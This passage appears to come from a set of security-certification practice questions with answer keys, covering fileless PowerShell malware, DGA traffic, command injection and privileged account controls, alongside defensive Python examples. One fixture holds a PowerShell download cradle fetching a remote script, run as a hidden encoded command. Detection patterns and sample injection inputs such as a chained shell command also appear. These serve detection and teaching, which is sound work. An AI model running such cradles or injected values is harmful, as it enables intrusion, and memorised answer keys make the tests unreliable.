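On the sample, svc_backup (idle about 200 days, owned) is disabled, svc_legacy_db is escalated rather than touched because no owner exists to confirm what still depends on it, adm_newhire is left alone under the new-account grace period, svc_retired is deleted only because it has already sat disabled for more than the quarantine window, and the unprivileged user_bob is out of scope for this review.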
Question 92
A SOC analyst detects unusual PowerShell execution on multiple endpoints. Scripts are obfuscated and connect to external IP addresses. Antivirus scans do not identify any malicious files. Which of the following BEST describes the type of threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware is designed to reside primarily in memory rather than writing files to disk, making it highly evasive against traditional signature-based antivirus solutions. In this scenario, the obfuscated PowerShell scripts connecting to unknown external IPs indicate that the malware leverages legitimate administrative tools to execute malicious actions. This living-off-the-land (LotL) approach minimizes detection by blending with normal system processes, allowing attackers to conduct reconnaissance, lateral movement, privilege escalation, and data exfiltration without leaving easily identifiable artifacts.
Detection requires advanced behavioral monitoring and endpoint detection and response (EDR) capabilities. Indicators include anomalous script execution, unusual process spawning, unexpected outbound network connections, and deviations from typical user or system behavior. Analysts often combine memory analysis, process monitoring, and network traffic inspection to identify fileless attacks. Mitigation involves isolating infected endpoints, terminating malicious processes, remediating compromised systems, and implementing application whitelisting to prevent unauthorized script execution.
Defensive strategies include enforcing least privilege, removing the legacy PowerShell 2.0 engine (which lacks script block logging and AMSI integration) and applying Constrained Language Mode where possible, using threat intelligence feeds to identify suspicious domains or IPs, and logging PowerShell activity with module logging, script block logging (Event ID 4104), and transcription. Script block logging records each block as the engine executes it, so the inner, de-obfuscated layers of an encoded or spliced command line end up in the log alongside the outer wrapper. Network segmentation, strict access controls, and user awareness limit lateral propagation, and incident response procedures for memory-resident threats should include memory capture before any reboot, since the evidence may not survive one.
B Standard ransomware encrypting files
Ransomware typically manifests as immediate file encryption and ransom notes, which is not observed here.
C Phishing emails delivering malicious attachments
While phishing may be an initial infection vector, the active execution of obfuscated scripts in memory suggests the presence of fileless malware rather than just email delivery.
D Distributed denial-of-service (DDoS) attack
DDoS attacks aim to overwhelm resources to degrade service availability and do not involve memory-resident script execution or obfuscated processes.
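The triage logic the fileless-malware questions (85, 90 and 92) describe, as an added example rather than code from the page: scoring PowerShell script-block events for living-off-the-land indicators, decoding -EncodedCommand payloads (base64 of UTF-16LE) before matching, and collapsing cheap string-splicing obfuscation so a spliced IEX is still recognised. It assumes the 4104 message text has already been extracted to plain strings by the SIEM; the hostnames, indicator weights, the staging IP and the sample records are constructed.

```python
"""Score PowerShell script-block log events (ID 4104) for fileless/LotL indicators.

Added example, not code from the page. Assumes the 4104 message text has already been
extracted to plain strings by the SIEM; hosts, weights and the records are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
SPLICE_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# (indicator, pattern, weight): weights are assumptions for the demo, not a published scheme.
INDICATORS = [
    ("encoded_command",   ENCODED_RE, 4),
    ("invoke_expression", re.compile(r"\bi(?:nvoke-)?ex(?:pression)?\b", re.I), 3),
    ("download_cradle",   re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I), 3),
    ("from_base64",       re.compile(r"FromBase64String", re.I), 2),
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy",     re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I), 2),
    ("raw_ip_url",        re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I), 3),
    ("string_splicing",   re.compile(r"'[^']{1,3}'\s*\+\s*'[^']{1,3}'|`[a-z]", re.I), 2),
]


@dataclass
class Finding:
    host: str
    score: int
    hits: List[str]
    decoded: Optional[str]


def decode_encoded_command(text: str) -> Optional[str]:
    """-EncodedCommand payloads are base64 of UTF-16LE; return the decoded script or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:                    # binascii.Error is a ValueError: not really base64
        return None


def normalise(text: str) -> str:
    """Undo cheap obfuscation before matching: join 'I'+'EX' style splices and drop backticks."""
    prev = None
    while prev != text:
        prev, text = text, SPLICE_RE.sub(r"'\1\2'", text)
    return text.replace("`", "")


def analyse(record: dict) -> Finding:
    """Match every indicator against the raw text, its normalised form and any decoded payload."""
    text = record["script_block"]
    decoded = decode_encoded_command(text)
    targets = [text, normalise(text)] + ([decoded, normalise(decoded)] if decoded else [])
    hits = [(name, w) for name, rx, w in INDICATORS if any(rx.search(t) for t in targets)]
    return Finding(record["host"], sum(w for _, w in hits), [n for n, _ in hits], decoded)


def triage(records, threshold: int = 6) -> List[Finding]:
    """Findings at or above the threshold; a single indicator is rarely enough to page on."""
    return [f for f in map(analyse, records) if f.score >= threshold]


# Constructed records. The encoded payload is built here so that it decodes correctly.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage1.ps1')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")
SAMPLE_4104 = [
    {"host": "WS01", "script_block": r"Get-ChildItem -Path C:\Users -Recurse | Where-Object { $_.Length -gt 10MB } | Select-Object FullName, Length"},
    {"host": "WS02", "script_block": r"Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi"},
    {"host": "WS05", "script_block": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    {"host": "WS07", "script_block": "$c=('I'+'EX');&$c ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($d)))"},
]

if __name__ == "__main__":
    for f in map(analyse, SAMPLE_4104):
        print(f"{f.host} score={f.score:2} hits={f.hits}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

WS02 downloads an installer with Invoke-WebRequest and scores on one indicator only, which is why the threshold matters: an administrator fetching an MSI looks like a download cradle until the surrounding context is considered. WS05 is the textbook case, and WS07 would slip past a literal match for IEX but not past the de-splicing step; with script block logging enabled the engine would also have logged the spliced block's de-obfuscated form as a separate 4104 event.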
Question 93
During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when malicious input is passed to the underlying operating system without proper sanitization, allowing attackers to execute arbitrary commands. Server-side input validation ensures that all user-supplied input matches expected types, lengths, and formats, effectively blocking malicious payloads. Parameterized commands or prepared statements further separate data from executable code, neutralizing injection attempts.
Secure coding practices, such as input validation, output encoding, and using secure frameworks, are essential to reduce vulnerabilities. Security teams can supplement these measures with web application firewalls (WAFs) to provide an additional layer of protection against common injection attacks. Regular static application security testing (SAST) and dynamic application security testing (DAST) enable early detection of potential vulnerabilities during development and testing phases.
Behavioral monitoring and logging also help identify attempts to exploit input validation weaknesses. Anomalies such as unusual characters, command patterns, or execution timing can indicate ongoing attacks. Proactive remediation, including patching vulnerable code, applying security updates, and conducting periodic security reviews, strengthens the overall application security posture. This multi-layered approach reduces the likelihood of OS-level command execution, protects sensitive data, and supports compliance with standards such as PCI DSS and the OWASP Application Security Verification Standard (ASVS).
B Enforce TLS encryption for all web traffic
TLS encrypts data in transit, ensuring confidentiality and integrity, but does not prevent input validation vulnerabilities or command injection attacks.
C Increase session timeout values
Adjusting session timeouts mitigates session hijacking but does not address application-layer injection vulnerabilities.
D Add additional firewall rules at the perimeter
Firewalls cannot inspect or validate application-level input, making them ineffective against OS-level command execution vulnerabilities.
Question 94
A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
Privileged Access Management (PAM) solutions with JIT access grant administrative privileges only for specific tasks and for limited time windows. This approach minimizes the risk of attackers leveraging stolen credentials to establish reverse shells or perform lateral movement. PAM systems also provide detailed session logging, real-time monitoring, and audit trails, enabling analysts to detect abnormal activity promptly.
JIT access reinforces the principle of least privilege by ensuring that users only receive elevated access when necessary. Combined with multi-factor authentication (MFA), PAM mitigates risks associated with stolen credentials and reduces the attack surface. Integration with EDR and SIEM solutions enables correlation of access events with anomalous network or process activity, enhancing incident detection and response.
Additionally, PAM facilitates compliance with regulatory frameworks, such as SOX, HIPAA, and PCI DSS, by providing auditable records of privileged access. Security teams can use these logs to perform forensic analysis, identify patterns of misuse, and implement proactive controls to prevent future compromise. PAM also reduces operational disruption by allowing controlled access for legitimate administrative tasks without eliminating necessary functionality.
B Increase password complexity for all accounts
While stronger passwords reduce brute-force risk, they do not mitigate attacks using already compromised credentials.
C Deploy signature-based antivirus on the server
Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.
D Disable all remote access capabilities
Disabling remote access is operationally impractical and can hinder legitimate administrative functions, whereas PAM with JIT provides a controlled, secure alternative.
Question 95
A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware operates primarily in memory and avoids writing executable files to disk, making it highly evasive and difficult to detect using traditional signature-based antivirus solutions. In this scenario, the execution of obfuscated PowerShell scripts and external communication to unknown IP addresses strongly indicates that attackers are leveraging legitimate administrative tools to achieve malicious objectives. This living-off-the-land (LotL) approach allows malware to perform reconnaissance, lateral movement, privilege escalation, and data exfiltration while minimizing forensic evidence.
Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include anomalous command execution, unexpected child processes, unusual outbound connections, and deviations from standard system behavior. Mitigation involves isolating compromised endpoints, terminating malicious processes, analyzing scripts for functionality, and remediating infected hosts.
Preventive strategies include application whitelisting, enforcement of least privilege, restricting PowerShell execution policy, logging and monitoring PowerShell activity, network segmentation, and integrating threat intelligence to detect and block communication with known malicious domains or IP addresses. These measures collectively reduce the attack surface and hinder the ability of attackers to exploit living-off-the-land techniques.
B Standard ransomware encrypting files
Ransomware usually manifests through file encryption and ransom notes, which is inconsistent with memory-resident malicious script execution.
C Phishing emails delivering malicious attachments
While phishing may be an initial infection vector, the active execution of obfuscated scripts demonstrates post-compromise fileless malware behavior.
D Distributed denial-of-service (DDoS) attack
DDoS attacks target service availability and do not involve obfuscated memory-resident scripts or external communication channels as observed here.
Question 96
A SOC analyst detects that multiple endpoints are communicating with external IP addresses over uncommon high-numbered ports. DNS logs show numerous queries to seemingly random domains. Which of the following BEST describes the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The pattern described—unusual outbound connections on uncommon ports combined with DNS queries to random or high-entropy domains—is characteristic of malware utilizing a domain generation algorithm (DGA). DGAs enable malware to create large numbers of pseudo-random domain names for command-and-control (C2) communications, making it difficult for defenders to block communication via static blacklists. This technique is often used by advanced persistent threat actors to maintain persistence and evade detection by conventional security controls.
Detecting DGA-based malware requires a multi-faceted approach. Analysts monitor DNS query patterns for anomalies such as high entropy, non-existent domains, and irregular query volumes. Network traffic analysis complements DNS monitoring, identifying suspicious outbound connections that deviate from normal patterns, such as uncommon ports or destinations outside typical geographies. Endpoint telemetry is equally critical, as it can reveal the execution of scripts, binaries, or memory-resident malware responsible for initiating these communications.
Mitigation involves isolating affected endpoints, blocking identified malicious domains and IPs, and removing malware from infected hosts. Reverse engineering the DGA can allow proactive blocking of future domain generations, reducing the effectiveness of the malware. Threat intelligence feeds can also help identify known C2 servers and DGA patterns. Furthermore, layered defense strategies—including endpoint detection and response (EDR), network segmentation, anomaly-based intrusion detection, and behavioral monitoring—ensure the organization can detect and respond to sophisticated malware campaigns promptly.
B Standard software update traffic
Legitimate software updates typically communicate with known servers on standard ports and do not generate random DNS queries. The observed behavior indicates a malicious C2 mechanism rather than routine maintenance traffic.
C Distributed denial-of-service (DDoS) attack
DDoS attacks involve overwhelming resources to degrade availability and do not exhibit covert C2 communications or randomized DNS requests.
D Misconfigured internal monitoring system
Misconfigurations can generate anomalous traffic but rarely produce the combination of external communication to uncommon ports and randomized domain queries observed here.
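As a worked example of the DNS-side detection described in this explanation (high-entropy labels, NXDOMAIN responses, irregular per-client volumes), the following script is an added illustration, not part of the original question set or any vendor product. The log lines are constructed for the example, and the thresholds (three or more queries, at least half NXDOMAIN, mean label entropy of 3.0 bits or more) are assumed starting values that a SOC would tune against its own baseline.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines for illustration (not taken from the page):
# <client IP> query <qname> <response code>
SAMPLE_DNS_LOG = """\
10.0.0.12 query www.microsoft.com NOERROR
10.0.0.12 query xk3q9vz7lmp2.com NXDOMAIN
10.0.0.12 query q8bz41tqvw0d.net NXDOMAIN
10.0.0.12 query a7pl0ms9x2kd.org NXDOMAIN
10.0.0.12 query wr4t8zq2lhpx.com NXDOMAIN
10.0.0.12 query update.example-vendor.com NOERROR
10.0.0.13 query mail.google.com NOERROR
10.0.0.13 query login.example-corp.com NOERROR
10.0.0.13 query cdn.jsdelivr.net NOERROR
"""

LINE_RE = re.compile(r"^(?P<client>\S+) query (?P<qname>\S+) (?P<rcode>\S+)$")


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; DGA labels cluster near log2(alphabet size)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname: str) -> str:
    """Second-level label of a query name. A production version should use the
    Public Suffix List so that names like example.co.uk are split correctly."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def parse_dns_log(text: str):
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("client"), m.group("qname"), m.group("rcode")


def analyze_dns_log(text: str, min_queries: int = 3,
                    nx_ratio: float = 0.5, min_entropy: float = 3.0) -> dict:
    """Per-client DGA indicators: NXDOMAIN ratio and mean entropy of the labels
    that failed to resolve. Thresholds are assumed values for the example."""
    per_client = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "nx_labels": []})
    for client, qname, rcode in parse_dns_log(text):
        stats = per_client[client]
        stats["queries"] += 1
        if rcode == "NXDOMAIN":
            stats["nxdomain"] += 1
            stats["nx_labels"].append(registrable_label(qname))

    report = {}
    for client, stats in per_client.items():
        labels = stats["nx_labels"]
        mean_entropy = sum(shannon_entropy(l) for l in labels) / len(labels) if labels else 0.0
        ratio = stats["nxdomain"] / stats["queries"]
        report[client] = {
            "queries": stats["queries"],
            "nxdomain": stats["nxdomain"],
            "nxdomain_ratio": round(ratio, 2),
            "mean_nx_entropy": round(mean_entropy, 2),
            "suspected_dga": (stats["queries"] >= min_queries
                              and ratio >= nx_ratio
                              and mean_entropy >= min_entropy),
        }
    return report


if __name__ == "__main__":
    for client, r in analyze_dns_log(SAMPLE_DNS_LOG).items():
        flag = "SUSPECTED DGA" if r["suspected_dga"] else "ok"
        print(f"{client}: {r['queries']} queries, {r['nxdomain']} NXDOMAIN, "
              f"mean entropy {r['mean_nx_entropy']:.2f} -> {flag}")
```

The flagged client is the one whose failed lookups are dominated by random-looking labels; a host that only resolves well-known names scores zero on both indicators. In practice this output is a triage queue to be joined with endpoint telemetry (which process issued the queries) and flow data (the uncommon-port connections the question describes), not a verdict on its own.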
Question 97
An internal audit reveals several privileged service accounts have not been used in over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive administrative accounts are particularly attractive to attackers because they retain privileges that may be leveraged for lateral movement or persistent access. Automated account deprovisioning removes or disables accounts after a defined period of inactivity, ensuring that only active users retain administrative rights. This approach enforces the principle of least privilege, reducing the potential attack surface.
Integrating deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement and generates audit logs for compliance purposes. These systems can automatically alert administrators to dormant accounts, remove access, and maintain documentation for regulatory reporting, such as PCI DSS, HIPAA, or SOX. By automating this process, organizations reduce human error associated with manual account reviews and ensure that dormant accounts do not linger undetected.
Deprovisioning also mitigates risks from stolen or leaked credentials, preventing attackers from exploiting accounts that are no longer needed. Organizations can complement this control with multi-factor authentication (MFA), anomaly detection, and access monitoring to further strengthen security posture. Continuous monitoring ensures that any unauthorized attempts to reactivate or access deprovisioned accounts are detected promptly. Overall, automated account deprovisioning is a proactive and scalable solution to minimize risks associated with dormant administrative accounts.
B Increase password complexity for service accounts
Strong passwords do not prevent attacks using dormant accounts. Even complex passwords are ineffective if the account remains active and the credentials are compromised.
C Disable all external SSH access
Restricting SSH access only addresses external threats and does not mitigate internal misuse of inactive accounts.
D Deploy full disk encryption on endpoints
While important for data protection, full disk encryption does not address the risk posed by dormant privileged accounts.
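To make the deprovisioning control concrete, here is an added example of the review logic an identity governance job would run: find enabled accounts that hold a privileged group and have been idle past the policy window, then produce a staged action plan. It is illustration code written for this explanation, not any directory product's API; the account records, group names and the 180-day and 90-day retention values are constructed for the example. Note the edge case the question hints at: an account that has never logged on is measured from its creation date rather than skipped.

```python
from datetime import datetime, timedelta, timezone

# Constructed directory export for illustration (not from the page). Timestamps
# are UTC; last_logon is None for accounts that have never authenticated.
AS_OF = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_ACCOUNTS = [
    {"name": "svc_backup", "enabled": True, "created": datetime(2021, 3, 1, tzinfo=timezone.utc),
     "last_logon": datetime(2023, 10, 15, tzinfo=timezone.utc), "groups": ["Domain Admins"]},
    {"name": "svc_legacy_app", "enabled": True, "created": datetime(2023, 1, 1, tzinfo=timezone.utc),
     "last_logon": None, "groups": ["Administrators"]},
    {"name": "svc_sql", "enabled": True, "created": datetime(2022, 5, 1, tzinfo=timezone.utc),
     "last_logon": datetime(2024, 5, 28, tzinfo=timezone.utc), "groups": ["Domain Admins"]},
    {"name": "svc_print", "enabled": True, "created": datetime(2020, 1, 1, tzinfo=timezone.utc),
     "last_logon": datetime(2023, 9, 1, tzinfo=timezone.utc), "groups": ["Print Operators"]},
    {"name": "svc_new", "enabled": True, "created": datetime(2024, 5, 20, tzinfo=timezone.utc),
     "last_logon": None, "groups": ["Domain Admins"]},
    {"name": "svc_retired", "enabled": False, "created": datetime(2019, 1, 1, tzinfo=timezone.utc),
     "last_logon": datetime(2022, 1, 1, tzinfo=timezone.utc), "groups": ["Domain Admins"]},
]

# Assumed set of groups treated as privileged for this example.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}


def idle_days(account: dict, as_of: datetime) -> int:
    """Days since last use; a never-used account is measured from creation."""
    reference = account["last_logon"] or account["created"]
    return (as_of - reference).days


def is_privileged(account: dict, privileged_groups=PRIVILEGED_GROUPS) -> bool:
    return any(g in privileged_groups for g in account["groups"])


def find_dormant_privileged(accounts, as_of: datetime = AS_OF, max_idle_days: int = 180,
                            privileged_groups=PRIVILEGED_GROUPS) -> list:
    """Enabled, privileged accounts idle longer than the policy window.
    Returns (name, idle_days, reason) tuples sorted by name."""
    hits = []
    for acct in accounts:
        if not acct["enabled"] or not is_privileged(acct, privileged_groups):
            continue
        days = idle_days(acct, as_of)
        if days > max_idle_days:
            reason = "never logged on" if acct["last_logon"] is None else "inactive"
            hits.append((acct["name"], days, reason))
    return sorted(hits)


def plan_deprovisioning(accounts, as_of: datetime = AS_OF, max_idle_days: int = 180,
                        retention_days: int = 90) -> list:
    """Staged actions: strip privileged groups first, disable the account, then
    schedule deletion after a retention period. Returns (account, action, detail)
    tuples; nothing is applied here, the caller feeds them to the directory."""
    plan = []
    for name, days, reason in find_dormant_privileged(accounts, as_of, max_idle_days):
        acct = next(a for a in accounts if a["name"] == name)
        for group in acct["groups"]:
            if group in PRIVILEGED_GROUPS:
                plan.append((name, "remove-from-group", group))
        plan.append((name, "disable", f"{reason}, {days} days idle"))
        plan.append((name, "delete-after", (as_of + timedelta(days=retention_days)).date().isoformat()))
    return plan


if __name__ == "__main__":
    for name, action, detail in plan_deprovisioning(SAMPLE_ACCOUNTS):
        print(f"{name}: {action} ({detail})")
```

Removing group membership before disabling the account matters: a disabled account can be re-enabled by anyone with rights over it, and if it still sits in Domain Admins it is immediately privileged again. Recording the planned actions (rather than applying them silently) is also what produces the audit trail the explanation mentions for PCI DSS, HIPAA or SOX reporting.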
Question 98
A web application is discovered to be vulnerable to OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection vulnerabilities occur when user input is improperly processed and executed by the operating system. Implementing server-side input validation ensures that all input conforms to expected formats, lengths, and types, preventing malicious commands from being executed. Parameterized commands or prepared statements further enforce a separation between user input and executable code, neutralizing potential injection attempts.
Secure coding practices, including input validation, output encoding, and the use of secure frameworks, are critical to preventing exploitation. Regular static and dynamic application security testing (SAST/DAST) identifies vulnerabilities early in the development lifecycle. Web application firewalls (WAFs) can supplement these measures by filtering malicious requests at the application layer.
Monitoring and logging input validation failures provides early warning of attempted attacks, enabling analysts to investigate and respond proactively. Remediation involves patching vulnerable code, updating libraries, and conducting periodic security reviews to ensure adherence to secure coding standards. This approach protects system integrity and sensitive data and supports compliance with regulatory frameworks such as PCI DSS and the OWASP Application Security Verification Standard (ASVS).
B Enforce TLS encryption for all web traffic
TLS protects data in transit but does not address application-layer input vulnerabilities or command injection attacks.
C Increase session timeout values
Session timeout adjustments protect against session hijacking but are ineffective against command injection vulnerabilities.
D Add additional firewall rules at the perimeter
Firewalls cannot inspect application-layer input or prevent malicious commands from executing, making them ineffective for mitigating command injection.
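Questions 93 and 98 both turn on the same control, so one added example serves both: the "before" form, where a form field is spliced into a shell command string, next to the hardened form, where the value must pass a strict host name allow-list and is then passed as a single argv element with no shell involved. This is illustration code written for this explanation, not from any real application; the diagnostics-endpoint scenario, the function names and the sample inputs are all assumed.

```python
import re
import subprocess

# Hypothetical diagnostics endpoint (assumed scenario, not a real application):
# an operator types a host name into a form and the server pings it.

# RFC 1123 host name syntax: letters, digits and hyphens in 1..63-char labels.
# As a strict allow-list it excludes shell metacharacters, whitespace and a
# leading '-' (which would otherwise be parsed as an option by the command).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def unsafe_ping_command(host: str) -> str:
    """'Before' form of the flaw in the question: the raw field value is spliced
    into a command string. Run with shell=True, anything the shell treats
    specially inside `host` becomes part of the command line."""
    return f"ping -c 1 {host}"


def is_valid_hostname(host: str) -> bool:
    return bool(HOSTNAME_RE.match(host.strip().lower()))


def validate_hostname(host: str) -> str:
    """Server-side allow-list validation; a rejection is the event to log."""
    cleaned = host.strip().lower()
    if not HOSTNAME_RE.match(cleaned):
        raise ValueError(f"rejected host name: {host!r}")
    return cleaned


def safe_ping_argv(host: str) -> list:
    """'After' form: validated input becomes one argv element. No shell is
    involved, so the value can only ever be interpreted as a host name."""
    return ["ping", "-c", "1", validate_hostname(host)]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False (the default) hands argv straight to exec(): no word
    # splitting, no metacharacters, no command chaining.
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=10)


def handle_requests(inputs) -> list:
    """Process a batch of form values and return (input, outcome) pairs. The
    rejections are the records worth forwarding to the SIEM as attempted injection."""
    results = []
    for value in inputs:
        try:
            argv = safe_ping_argv(value)
            results.append((value, "accepted:" + " ".join(argv)))
        except ValueError:
            results.append((value, "rejected"))
    return results


# Constructed inputs: two legitimate host names and two that a shell would
# interpret as more than a host name.
SAMPLE_INPUTS = ["Example.com", "10.0.0.7", "example.com; id", "$(hostname)"]

if __name__ == "__main__":
    print("unsafe:", unsafe_ping_command(SAMPLE_INPUTS[2]))  # metacharacters survive
    for value, outcome in handle_requests(SAMPLE_INPUTS):
        print(f"{value!r}: {outcome}")
```

Two layers are doing the work here. The allow-list rejects anything that is not a host name before it reaches the command, and the argv form means that even a value which slipped past validation could not start a second command, because no shell ever parses it. This is the command-execution analogue of the parameterized statements the explanation mentions: data and code travel in separate slots.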
Question 99
A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
PAM with JIT access ensures that administrative privileges are granted only when required and for limited periods, reducing the window in which attackers can leverage stolen credentials. By limiting persistent access, PAM mitigates the risk of reverse shells and lateral movement attacks. PAM systems also provide detailed session logging, monitoring, and auditing, enabling analysts to detect suspicious behavior and respond promptly.
JIT access reinforces the principle of least privilege by ensuring that elevated privileges are not continuously available. Integration with multi-factor authentication (MFA) and endpoint detection solutions further enhances security. PAM enables organizations to maintain operational efficiency while reducing the risk associated with high-privilege accounts. Detailed logging supports compliance with regulatory frameworks, such as SOX, HIPAA, and PCI DSS, providing auditable records for privileged access.
Mitigation strategies include monitoring for anomalous login patterns, enforcing time-bound access windows, and combining PAM with threat intelligence to detect suspicious C2 activity. Overall, PAM with JIT is a proactive and highly effective control to prevent post-compromise attacks that exploit privileged accounts.
B Increase password complexity for all accounts
Strong passwords reduce brute-force attack risk but do not mitigate attacks using stolen credentials.
C Deploy signature-based antivirus on the server
Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.
D Disable all remote access capabilities
Disabling remote access entirely may hinder legitimate administration, whereas PAM with JIT offers controlled and secure access.
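Questions 94 and 99 describe the same control, so one added example covers both: a small model of a JIT elevation broker showing why stolen credentials on their own do not yield a usable privilege. This is illustration code written for this explanation, not any vendor's PAM product or API; the broker design, role and ticket names, and the 30-minute ceiling are assumed. Authorization is default-deny, a grant needs a change ticket and an MFA-verified request, it lives only inside its window, and every decision lands in an audit list that a SIEM would ingest.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Tuple


@dataclass
class Grant:
    user: str
    role: str
    ticket: str
    granted_at: datetime
    expires_at: datetime
    revoked: bool = False


class JitBroker:
    """Hypothetical JIT elevation broker (assumed design for this example).
    Rules: no standing privilege; every grant is tied to a change ticket and an
    MFA-verified request; access exists only inside a bounded window; every
    decision is appended to an audit trail."""

    def __init__(self, max_minutes: int = 60):
        self.max_minutes = max_minutes
        self.grants: List[Grant] = []
        self.audit: List[Tuple[datetime, str, str]] = []

    def _log(self, at: datetime, event: str, detail: str) -> None:
        self.audit.append((at, event, detail))

    def request(self, user: str, role: str, ticket: str, minutes: int,
                mfa_verified: bool, at: datetime) -> Grant:
        if not mfa_verified:
            self._log(at, "deny", f"{user} requested {role} without MFA")
            raise PermissionError("MFA required for privileged elevation")
        if not ticket:
            self._log(at, "deny", f"{user} requested {role} without a ticket")
            raise PermissionError("change ticket required")
        minutes = min(minutes, self.max_minutes)  # never exceed the policy ceiling
        grant = Grant(user, role, ticket, at, at + timedelta(minutes=minutes))
        self.grants.append(grant)
        self._log(at, "grant", f"{user} -> {role} until {grant.expires_at.isoformat()} ({ticket})")
        return grant

    def is_authorized(self, user: str, role: str, at: datetime) -> bool:
        """Default deny: authorization exists only inside a live, unrevoked window."""
        for g in self.grants:
            if (g.user == user and g.role == role and not g.revoked
                    and g.granted_at <= at < g.expires_at):
                self._log(at, "allow", f"{user} used {role} under {g.ticket}")
                return True
        self._log(at, "deny", f"{user} attempted {role} with no active grant")
        return False

    def revoke(self, user: str, role: str, at: datetime, reason: str) -> int:
        """Manual revocation, e.g. SOC response to a suspicious session."""
        count = 0
        for g in self.grants:
            if g.user == user and g.role == role and not g.revoked:
                g.revoked = True
                count += 1
        self._log(at, "revoke", f"{user} {role}: {reason} ({count} grant(s))")
        return count


def run_demo() -> dict:
    """Fixed-clock walk-through so the outcomes are reproducible."""
    t0 = datetime(2024, 6, 1, 9, 0, tzinfo=timezone.utc)
    broker = JitBroker(max_minutes=30)
    out = {}
    out["before_grant"] = broker.is_authorized("alice", "server-admin", t0)
    broker.request("alice", "server-admin", "CHG-0001", 30, True, t0)
    out["inside_window"] = broker.is_authorized("alice", "server-admin", t0 + timedelta(minutes=10))
    out["after_expiry"] = broker.is_authorized("alice", "server-admin", t0 + timedelta(minutes=31))
    out["other_user"] = broker.is_authorized("bob", "server-admin", t0 + timedelta(minutes=10))
    try:
        broker.request("bob", "server-admin", "CHG-0002", 10, False, t0)
        out["no_mfa_rejected"] = False
    except PermissionError:
        out["no_mfa_rejected"] = True
    out["denials_logged"] = sum(1 for _, event, _ in broker.audit if event == "deny")
    return out


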